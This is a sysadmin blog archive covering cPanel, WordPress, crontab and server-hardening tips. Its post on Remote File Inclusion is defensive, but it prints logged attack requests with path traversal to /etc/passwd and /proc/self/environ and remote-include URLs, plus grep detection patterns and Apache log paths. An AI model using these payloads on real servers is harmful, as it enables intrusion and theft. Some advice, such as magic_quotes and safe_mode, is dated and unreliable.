Tuesday, September 27, 2016

Error: no C compiler found

If you get the error below while compiling:

Configuring for  Linux-x86_64
Checking for gcc : No
Checking for cc : No
error: no C compiler found

Try:

yum groupinstall "Development Tools"

After that you can try the compilation of Code Blocks again.



Monday, June 1, 2015

How to Reset a Wordpress Password

If you have forgotten your WordPress credentials, or your WordPress install has been compromised, you may need to change your admin username and/or password to regain access to your site.

Reset a User's password through MySQL
  • Log in to your wordpress database using MySQL's command line interface
  • Find the ID of the user's password you want to change
SELECT ID, user_login, user_pass FROM wp_users;
  • Change that user's password to a new one
UPDATE wp_users SET user_pass=MD5('newstrongpassword') WHERE ID = usersID;

Reset a User's Password through phpMyAdmin

If you have Plesk or cPanel, phpMyAdmin should be included by default. Open it for the domain and database that your WordPress site uses. If you don't remember the database name, look in your wp-config.php for a line similar to this:
define('DB_NAME', 'wordpress_blog');
In this example, "wordpress_blog" is the name of the database.
  • Once you're logged in to phpmyadmin, click on the wp_users table.
  • Make sure you are on the browse screen
  • Find the username you want to change the password for
  • Click edit on that username
  • Enter in your new password in the Value field of the user_pass line
  • Select "MD5" from the dropdown under the Functions column for the user_pass line
  • Click Go at the bottom of the screen, and then you should be able to log in with the new password

How to change the primary IP address of a cPanel server



Log in to SSH, and do the following:

Edit /etc/sysconfig/network-scripts/ifcfg-eth0

Change the IPADDR and GATEWAY lines to match the new IP and its gateway


Edit /etc/sysconfig/network
Change the GATEWAY line here if it does not exist in the ifcfg-* file.


Edit /etc/ips
Remove the new primary IP from this file if it is present
Add the old primary IP to this file with the format ::


Edit /var/cpanel/mainip
Replace the old primary IP with the new primary IP


Edit /etc/hosts
Replace the old primary IP with the new one if needed. The hostname's DNS will need to be updated too


Restart the network service to make the new IP the primary
service network restart
Note: You're probably going to be disconnected at this point, and have to log in to ssh using the new primary ip.


Restart the ipaliases script to bring up the additional IP
service ipaliases restart


Run ifconfig and make sure all IPs show up correctly


Update the cpanel license to the new primary IP


Verify you can still log in to WHM and there is no license warning
Verify cPanel

Tuesday, May 19, 2015

Linux Crontab

The Linux cron utility is an effective way to schedule a routine background job at a specific time and/or day on an ongoing basis.

Linux Crontab Format


MIN  HOUR  DOM  MON  DOW  CMD
*    *     *    *    *

Table: Crontab Fields and Allowed Ranges (Linux Crontab Syntax)

Field  Description    Allowed Value
MIN    Minute field   0 to 59
HOUR   Hour field     0 to 23
DOM    Day of Month   1-31
MON    Month field    1-12
DOW    Day Of Week    0-6
CMD    Command        Any command to be executed.




Friday, November 14, 2014

Remote File Inclusion (RFI) attacks


Remote File Inclusion (RFI) is a technique used to attack Web applications from a remote computer. Such attacks allow malicious users to run their own code on a vulnerable Web server by including code from a URL to a remote server. When an application executes the malicious code, it may lead to a back-door exploit or technical information retrieval. This is an application vulnerability that is a result of insufficient validation of user inputs.



Disable allow_url_fopen in php.ini by setting it to 0

Enable safe_mode and set open_basedir restrictions (if you know what you're doing - it's not really that safe!)

Lock down the server environment to prevent the server from making new outbound requests

Using Apache mod_rewrite is also an effective security measure to prevent RFI attacks. To use it, in your .htaccess, add the following lines:

RewriteEngine On
RewriteCond %{QUERY_STRING} (.*)(http|https|ftp)://(.*)
RewriteRule ^(.+)$ - [F,L]

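The RewriteCond matches any query string that contains an http://, https:// or ftp:// URL, and the RewriteRule decides what happens to the matching request. Here the F flag returns 403 Forbidden and the L flag stops further rule processing, so the request is blocked.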

There are two php.ini options you can set, which control different aspects of file handling, and work to prevent RFI:

allow_url_fopen=off
allow_url_include=off

The magic_quotes directives represent PHP functionality that automatically escapes quotes passed by the user to the application. For example, in php.ini, set magic_quotes_gpc=On to automatically escape all single and double quotes, backslashes and NULLs with a backslash, in GETs, POSTs and cookies. The other magic quote directive (magic_quotes_runtime=On) will escape quotes for a select list of functions.

Apache log poisoning with LFI




Apache normally uses two log files: access_log, which contains all valid requests to the Web server, and error_log, which contains error messages.

/etc/httpd/logs/, /opt/lampp/logs/, /usr/local/apache/log, /usr/local/apache/logs/, /usr/local/etc/httpd/logs/, /usr/local/www/logs/thttpd_log, /var/apache/logs/, /var/log/apache/, /var/log/apache-ssl/, /var/log/httpd/, /var/log/httpsd/ssl.access_log


RFI Detection

Just a few commands to find out who's knocking. Feel free to expand on what's here as new RFI attacks are discovered.


grep -hr '\.\.\/\.\.\/' /usr/local/apache/logs/*_log | sed 's/ - \[.*"GET / "/' | awk '{print $1" - "$2" - "$3}' > /tmp/rfi-attacks.log

grep -hr '\/etc\/passwd' /usr/local/apache/logs/*_log | sed 's/ - \[.*"GET / "/' | awk '{print $1" - "$2" - "$3}' > /tmp/rfi-attacks.log

Real World Output (target domain omitted to protect the innocent):
~~~~~~~~~~~
208.158.248.5 - example.com - "//lists/admin/index.php?_SERVER[ConfigFile]=../../../../../../../../../../../../../../../../../../../../../../../etc/passwd"
208.158.248.5 - example.com - "//newsletter/admin/index.php?_SERVER[ConfigFile]=../../../../../../../../../../../../../../../../../../../../../../../etc/passwd"
208.158.248.5 - example.com - "//news/admin/index.php?_SERVER[ConfigFile]=../../../../../../../../../../../../../../../../../../../../../../../etc/passwd"
208.158.248.5 - example.com - "//phplist/admin/index.php?_SERVER[ConfigFile]=../../../../../../../../../../../../../../../../../../../../../../../etc/passwd"
208.158.248.5 - example.com - "//phpList/admin/index.php?_SERVER[ConfigFile]=../../../../../../../../../../../../../../../../../../../../../../../etc/passwd"
208.158.248.5 - example.com - "//admin/index.php?_SERVER[ConfigFile]=../../../../../../../../../../../../../../../../../../../../../../../etc/passwd"
207.191.225.14 - example.com- "/ssa-pampanga-pg-wisdom-v-13xSmAeUo2o.html/?pg=../../../../../../../../../../../../../../../../proc/self/environ?"
207.191.225.14 - example.com - "/?pg=../../../../../../../../../../../../../../../../proc/self/environ?"
67.207.138.14 - example.com - "/?pg=/../../../../../../../../proc/self/environ"
21.26.32.199 - example.com - "/?pg=/../../../../../../../../proc/self/environ"
~~~~~~~~~~~




grep -hr 'SERVEQDOCUMENT_ROOT' /usr/local/apache/logs/*_log | sed 's/ - \[.*"GET / "/' | awk '{print $1" - "$2" - "$3}' > /tmp/rfi-attacks.log

207.191.225.14 - example.com - "/?_SERVEQDOCUMENT_ROOT=http://www.some-RFI-rooted-site.or.kr/bbs/data/zfxid1.txt?"

grep -hr 'DOCUMENT_ROOT' /usr/local/apache/logs/*_log | sed 's/ - \[.*"GET / "/' | awk '{print $1" - "$2" - "$3}' > /tmp/rfi-attacks.log

21.206.20.162 - example.com - "///?_SERVER[DOCUMENT_ROOT]=http://some-RFI-rooted-site.ca/bbs//nyawa.txt??"
10.45.14.165 - example.com - "/%20%20////?_SERVER[DOCUMENT_ROOT]=http://www.some-RFI-rooted-site.com.au/nGagLiks/myfiles/zfxid1.txt?"

grep -hr '\.txt??' /usr/local/apache/logs/*_log | grep -v '\/robots.txt' | sed 's/ - \[.*"GET / "/' | awk '{print $1" - "$2" - "$3}' > /tmp/rfi-attacks.log

10.45.14.165 - example.com- "//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://some-RFI-rooted-site.co.kr/plugins/logs/gue/fx29id.txt??"
21.206.20.162 - example.com- "/ashop/catalogue.php?cat=http://www.some-RFI-rooted-site.com//pdf/1.txt??"
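
The grep patterns above combined into a single pass, as an added example that is not part of the original post: this Python script percent-decodes each query string before matching, so encoded requests are tagged by the same rules. The log lines are constructed samples in Apache common log format, and the rule labels and function names are hypothetical.

```python
import re
from urllib.parse import unquote

# Client IP and request URL from an Apache common/combined log line.
REQ = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+)')

# Indicators mirroring this page's grep patterns (labels are hypothetical).
RULES = [
    ("remote-include", re.compile(r"=\s*(?:https?|ftp)://", re.I)),
    ("traversal", re.compile(r"\.\./\.\./")),
    ("sensitive-file", re.compile(r"/etc/passwd|/proc/self/environ")),
    ("superglobal-override", re.compile(r"_SERVER\[\w+\]=", re.I)),
]

def classify(line):
    """Return (ip, path, [indicators]) for a suspicious line, else None."""
    m = REQ.match(line)
    if not m:
        return None
    ip, url = m.groups()
    path, _, query = url.partition("?")
    query = unquote(unquote(query))  # undo single and double percent-encoding
    tags = [name for name, rx in RULES if rx.search(query)]
    return (ip, path, tags) if tags else None

def summarize(lines):
    """Map each source IP to the sorted indicators seen from it."""
    hits = {}
    for line in lines:
        found = classify(line)
        if found:
            hits.setdefault(found[0], set()).update(found[2])
    return {ip: sorted(tags) for ip, tags in hits.items()}

# Constructed sample lines (documentation IP range, made-up hosts).
LOG = '%s - - [14/Nov/2014:10:00:00 +0000] "GET %s HTTP/1.1" 200 512'
SAMPLE = [LOG % pair for pair in [
    ("192.0.2.10", "/index.php?page=about"),
    ("192.0.2.11", "/?pg=../../../../proc/self/environ"),
    ("192.0.2.12", "/shop.php?cat=http://rfi-host.example/1.txt??"),
    ("192.0.2.12", "/shop.php?cat=http%3A%2F%2Frfi-host.example%2F1.txt"),
    ("192.0.2.13", "/admin/index.php?_SERVER[ConfigFile]=../../../etc/passwd"),
]]

if __name__ == "__main__":
    for ip, tags in summarize(SAMPLE).items():
        print(ip, ", ".join(tags))
```

The remote-include rule also fires on legitimate parameters that carry a URL, so treat its hits as candidates for review rather than confirmed attacks.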


With such a vulnerability, attackers can execute any binary on the server like starting a telnet server, logging in to it with the privileges of a Web server user, performing exploits to gain root access, and perhaps attacking other hosts that are reachable from the compromised server.


Reference

https://documentation.cpanel.net/display/CKB/PHP+Security+Concepts

Wednesday, November 12, 2014

Linux command verifying CMS version on cPanel server

Wordpress version:

 find /home/*/public_html/ -type f -iwholename "*/wp-includes/version.php" -exec grep -H "\$wp_version =" {} \;


 Joomla! 1/2/3 version and release:
 Linux/cPanel:
find /home/*/public_html/ -type f \( -iwholename '*/libraries/joomla/version.php' -o -iwholename '*/libraries/cms/version.php' -o -iwholename '*/libraries/cms/version/version.php' \) -print -exec perl -e 'while (<>) { $release = $1 if m/ \$RELEASE\s+= .([\d.]+).;/; $dev = $1 if m/ \$DEV_LEVEL\s+= .(\d+).;/; } print qq($release.$dev\n);' {} \; && echo "-"

Drupal version
Linux/cPanel:
find /home/*/public_html/ -type f -iwholename "*/modules/system/system.info" -exec grep -H "version = \"" {} \;
 Linux/Plesk:

Friday, October 31, 2014

How to prevent DoS attack on a cPanel server

Check and block WordPress and xmlrpc attacks on a cPanel server


If you are seeing a lot of requests to wp-login.php, you can conclude it is a WordPress attack. The script below shows a sorted list of the IPs accessing wp-login:


====
-----------

egrep 'wp-login.php' /usr/local/apache/domlogs/* | grep -v ftp_log | awk -F : '{print $2}' | awk '{print $1}' | sort | uniq -c | sort -n

====
-----------
We can get the IPs from the access log with the script below:

grep -r "xx/Aug/2014" /usr/local/apache/domlogs/ | grep "xmlrpc.php" | awk '{ print $1 }' | cut -d : -f2 | sort | uniq -c | sort -n > /root/testwp

-----------
grep wp-login.php /usr/local/apache/domlogs/* | grep "16/Jan/2013:03" | awk '{print $1}' | cut -d: -f2 | sort | uniq -c | sort -n | tail



CSF tuning 

vi /etc/csf/csf.conf
----
# To disable this feature, set this to 0
CT_LIMIT = "50"
----


Where 50 is the maximum number of connections from an IP address. You need to specify the port number also.



vi /etc/csf/csf.conf
----
# Leave this option empty to count all ports against CT_LIMIT
CT_PORTS = "80,53,22"
----


We can also use other CT options.

CT_INTERVAL = "30"
CT_BLOCK_TIME = "1800"



IPTable rule:

iptables -A INPUT -p tcp --dport 80 -m limit --limit 25/minute --limit-burst 100 -j ACCEPT

------------------------
-A : Append
-p : Protocol
--dport : For ports
-m limit : Use the limit iptables extension
--limit 25/minute : Defines a maximum of 25 connections per minute.
--limit-burst 100 : The limit per minute is enforced only after the total number of connections has reached the limit-burst level, i.e. 100 here
-j : Target

--------------------------
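
How --limit and --limit-burst interact in the rule above, as an added Python model (not code from the original post or from iptables itself): the match behaves as a token bucket that starts with 100 tokens and refills at 25 per minute. The bucket belongs to the rule rather than to each source IP, and packets that do not match continue to the next rule, so the limit only takes effect when a later rule or the chain policy drops them. Class and function names are hypothetical, and the traffic is constructed.

```python
class LimitMatch:
    """Token-bucket model of one '-m limit' rule (shared by all sources)."""

    def __init__(self, per_minute=25, burst=100):
        self.rate = per_minute / 60.0  # tokens refilled per second
        self.burst = burst             # bucket capacity (--limit-burst)
        self.tokens = float(burst)     # the bucket starts full
        self.last = 0.0

    def matches(self, now):
        """True if a packet arriving at `now` seconds matches the rule."""
        elapsed = now - self.last
        self.tokens = min(self.burst, self.tokens + elapsed * self.rate)
        self.last = now
        if self.tokens >= 1.0:
            self.tokens -= 1.0
            return True   # rule matches: -j ACCEPT applies
        return False      # no match: packet continues to the next rule


def accepted(arrivals, per_minute=25, burst=100):
    """Count packets (sorted arrival times in seconds) the rule accepts."""
    rule = LimitMatch(per_minute, burst)
    return sum(rule.matches(t) for t in arrivals)


# Constructed traffic: 150 packets at once, then one per second for 59 s.
FLOOD = [0.0] * 150 + [float(t) for t in range(1, 60)]
# Constructed traffic: one packet every 3 s for 10 minutes (under the rate).
STEADY = [3.0 * i for i in range(200)]

if __name__ == "__main__":
    print("flood accepted:", accepted(FLOOD), "of", len(FLOOD))
    print("steady accepted:", accepted(STEADY), "of", len(STEADY))
```

Because the rule as written counts every packet to port 80, not only new connections, the model treats each arrival as one packet.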